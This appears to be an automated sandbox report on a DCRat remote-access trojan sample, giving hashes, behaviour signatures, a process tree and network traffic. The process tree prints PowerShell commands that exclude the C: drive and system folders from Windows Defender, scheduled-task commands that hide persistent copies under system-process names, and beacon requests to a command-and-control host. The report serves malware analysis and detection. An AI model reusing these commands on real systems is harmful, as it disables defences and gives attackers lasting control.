Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13/09/2024, 17:30 UTC

General

  • Target

    4a51d27aaaa0bb67872d99147bae13d0N.exe

  • Size

    4.9MB

  • MD5

    4a51d27aaaa0bb67872d99147bae13d0

  • SHA1

    a2b4c8f679911bc03a14e4f9be242ef9b0e4d97d

  • SHA256

    9636a592ea745fc8173b9ec8527f94fc8733ca1157837009ead6ed97293e2d5e

  • SHA512

    e208fb10b57ff8dcec352887ac8221bf348af5dbdae73ab1cd6885edbce26a2e81d96bf6f89bd5e482e30c2016fb73172eb714e3f77bebfe43bbd98bed381b6d

  • SSDEEP

    49152:bl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Process spawned unexpected child process 30 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 24 IoCs
  • DCRat payload 1 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 7 IoCs
  • Checks whether UAC is enabled 1 TTPs 16 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 30 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\4a51d27aaaa0bb67872d99147bae13d0N.exe
    "C:\Users\Admin\AppData\Local\Temp\4a51d27aaaa0bb67872d99147bae13d0N.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1168
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2308
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1124
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1732
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2664
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VNwVo2iwMr.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2652
      • C:\Windows\system32\w32tm.exe
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        3⤵
          PID:2424
        • C:\Windows\debug\lsm.exe
          "C:\Windows\debug\lsm.exe"
          3⤵
          • UAC bypass
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:1684
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\34a6af7f-ca3d-40c8-83fa-179d91ed9120.vbs"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:584
            • C:\Windows\debug\lsm.exe
              C:\Windows\debug\lsm.exe
              5⤵
              • UAC bypass
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • System policy modification
              PID:2376
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\40462058-980b-4cf3-aec0-367861db6309.vbs"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2432
                • C:\Windows\debug\lsm.exe
                  C:\Windows\debug\lsm.exe
                  7⤵
                  • UAC bypass
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  • System policy modification
                  PID:2448
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\74763952-74bb-4108-96ad-56685b50acd1.vbs"
                    8⤵
                      PID:2948
                      • C:\Windows\debug\lsm.exe
                        C:\Windows\debug\lsm.exe
                        9⤵
                        • UAC bypass
                        • Executes dropped EXE
                        • Checks whether UAC is enabled
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • System policy modification
                        PID:2848
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1730fbff-42f3-4cf2-b3bc-2f5660e183e0.vbs"
                          10⤵
                            PID:296
                            • C:\Windows\debug\lsm.exe
                              C:\Windows\debug\lsm.exe
                              11⤵
                              • UAC bypass
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • System policy modification
                              PID:2656
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e07ed1f8-d307-452d-9851-72fc6a525d85.vbs"
                                12⤵
                                  PID:2484
                                  • C:\Windows\debug\lsm.exe
                                    C:\Windows\debug\lsm.exe
                                    13⤵
                                    • UAC bypass
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • System policy modification
                                    PID:1844
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\95765e55-f5c6-428e-a6cb-07fd844c8ab0.vbs"
                                      14⤵
                                        PID:2916
                                        • C:\Windows\debug\lsm.exe
                                          C:\Windows\debug\lsm.exe
                                          15⤵
                                          • UAC bypass
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • System policy modification
                                          PID:2644
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77c07c7f-ddf3-4b5e-a63e-e3d35fc75a06.vbs"
                                            16⤵
                                              PID:1628
                                            • C:\Windows\System32\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5651755-52ed-460a-8b07-ce9e1ae796fa.vbs"
                                              16⤵
                                                PID:780
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8a8961ea-9d21-49a1-bff8-b3edc2032590.vbs"
                                            14⤵
                                              PID:1756
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8a4e2aa3-744e-45d6-95fb-784b3f707e88.vbs"
                                          12⤵
                                            PID:1260
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f5644b66-1ec8-4250-b2dc-bd01d9bc5b5c.vbs"
                                        10⤵
                                          PID:884
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1eb92b2b-8f3a-449a-a18d-b555f39747be.vbs"
                                      8⤵
                                        PID:1712
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\137cbba6-2154-4447-b903-0f2bbb3b61a0.vbs"
                                    6⤵
                                      PID:3008
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aae0aa8a-2995-46f4-be4c-59474ac78cc7.vbs"
                                  4⤵
                                    PID:320
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "lsml" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\lsm.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2752
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\debug\lsm.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2788
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Windows\debug\lsm.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2592
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\taskhost.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2700
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Default User\taskhost.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:3020
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\taskhost.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1520
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\Idle.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2768
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\Idle.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1156
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\Idle.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1844
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "4a51d27aaaa0bb67872d99147bae13d0N4" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Games\Chess\it-IT\4a51d27aaaa0bb67872d99147bae13d0N.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2148
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "4a51d27aaaa0bb67872d99147bae13d0N" /sc ONLOGON /tr "'C:\Program Files\Microsoft Games\Chess\it-IT\4a51d27aaaa0bb67872d99147bae13d0N.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2104
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "4a51d27aaaa0bb67872d99147bae13d0N4" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Games\Chess\it-IT\4a51d27aaaa0bb67872d99147bae13d0N.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2288
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "4a51d27aaaa0bb67872d99147bae13d0N4" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\4a51d27aaaa0bb67872d99147bae13d0N.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2880
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "4a51d27aaaa0bb67872d99147bae13d0N" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\4a51d27aaaa0bb67872d99147bae13d0N.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2312
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "4a51d27aaaa0bb67872d99147bae13d0N4" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\4a51d27aaaa0bb67872d99147bae13d0N.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2896
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Google\Chrome\smss.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2024
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\smss.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1964
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\Chrome\smss.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1304
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\winlogon.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2304
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\winlogon.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2176
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\winlogon.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1044
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:264
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1316
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2524
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\dllhost.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:3048
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\dllhost.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:3000
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\dllhost.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2980
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\smss.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2052
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\smss.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1728
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\smss.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1952

                            Network

                            • flag-us
                              DNS
                              81888.cllt.nyashteam.ru
                              lsm.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              81888.cllt.nyashteam.ru
                              IN A
                              Response
                              81888.cllt.nyashteam.ru
                              IN A
                              104.21.2.8
                              81888.cllt.nyashteam.ru
                              IN A
                              172.67.186.200
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401 HTTP/1.1
                              Accept: */*
                              Content-Type: text/plain
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                              Host: 81888.cllt.nyashteam.ru
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:30:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4qMuH2mNsUBUpJ2vrvokLLzi%2BJ1DS8EMgfUuxuwQtre3oiiakrurM%2BgVRIUYzEVC6HjtcKrZcx70dLe6nxnn1o0VDn%2FJ6G0pBWxzwn5ztbuyr31QvhTwgnI05qMEPAabibKcXNnPRPN0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29ddee4a2ccd11-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Hwttur026jPGE3CYpubs6FCvHL=euamfIVB0zPeq401 HTTP/1.1
                              Accept: */*
                              Content-Type: text/plain
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                              Host: 81888.cllt.nyashteam.ru
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:30:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XhBb9Lq1Y1RJcYW8WAHCBruAn6o6j4ohP52Wyf8LxiRZwc4FYtV%2FXb2p4vGoNPGQhqV5ksrJHYPjaevvU23WZ9jT2eNKsAMsR8SfP6%2FfSQ%2FXzZVKl456lX73EcuLj%2BzJdEZzzPyzLiCDUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29ddefbc73cd11-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s HTTP/1.1
                              Accept: */*
                              Content-Type: text/html
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                              Host: 81888.cllt.nyashteam.ru
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Fri, 13 Sep 2024 17:30:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lim9XXWdoUiR7I9hNx1l1tWfswT2IlwA5qHUbQF9BMd%2F6l3ulS97IQEWx6UBXUOY%2B7KrWVjslh6GeQnaSgNsmtA3f9HftFmVnkGFxWtZhpzahMw2hQZb1Yf88vkr3Ny77L9xcxbV%2BsmbLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c29de24bc096551-LHR
                              alt-svc: h3=":443"; ma=86400
                            • flag-us
                              GET
                              http://81888.cllt.nyashteam.ru/nyashsupport.php?b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s
                              lsm.exe
                              Remote address:
                              104.21.2.8:80
                              Request
                              GET /nyashsupport.php?b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&b5h6oaLUsZTYoct4lf=rJx1EB6O2I7mEW9j4CUwt97e0s HTTP/1.1
                              Accept: */*
                              Content-Type: text/html
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                              Host: 81888.cllt.nyashteam.ru
                              Response
                              HTTP/1.1 404 Not Found
